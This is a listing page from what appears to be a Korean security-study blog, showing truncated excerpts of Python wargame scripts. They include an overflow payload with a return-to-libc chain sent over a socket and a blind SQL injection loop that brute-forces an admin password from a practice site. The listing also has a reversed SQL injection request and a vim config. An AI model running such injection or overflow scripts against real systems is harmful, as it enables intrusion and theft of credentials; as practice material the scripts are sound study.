๐’ƒ๐’†๐’‚๐’–๐’•๐’š ๐’Š๐’๐’•๐’†๐’๐’๐’Š๐’ˆ๐’†๐’๐’•
728x90
๋ฐ˜์‘ํ˜•
mac ํ„ฐ๋ฏธ๋„ vim ๊พธ๋ฏธ๊ธฐ
Security Study/Source 2015. 12. 10. 17:50

vi ~/.vimrc 2 || has("gui_running") syntax on set hlsearchendif " Only do this part when compiled with support for autocommands.if has("autocmd") " Enable file type detection. " Use the default filetype settings, so that mail gets 'tw' set to 72, " 'cindent' is on in C files, etc. " Also load indent files, to automatically do language-dependent indenting. filetype plugin indent on " Put these in..

rtl chain
Security Study/Source 2015. 11. 21. 13:40

from socket import * HOST = ""PORT = 4444 s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"payload += "\xa..

sql injection reverse
Security Study/Source 2015. 11. 21. 13:30

import urllibimport urllib2 url = ""req = urllib2.Request(url)sql = "union select 0x61646D696E 32%"data = "id=%00&pw=" + sql[::-1]#data = urllib.urlencode(data)req = urllib2.Request(url, data) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')req.add_header('Cookie', 'PHPSESSID=') response = urllib2.urlopen(req)h..

์†Œ์ผ“ํ”„๋กœ๊ทธ๋ž˜๋ฐ
Security Study/Source 2015. 11. 21. 13:27

from socket import * HOST = "" #hostPORT = 4444 #port s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260 #payload print s.recv(1024) #1024 byte reads.send(payload + "\n")print s.recv(1024)print s.recv(1024)

Blind Sql Injection
Security Study/Source 2015. 11. 21. 13:24

#http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) print 1111 req.add_header('cookie',"PHPSESSID=") res = urllib2.urlopen(req) dat..

Base 64 encoding
Security Study/Source 2015. 11. 21. 13:22

import base64 str64=""str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n",""))

728x90
๋ฐ˜์‘ํ˜•
profile on loading

Loading...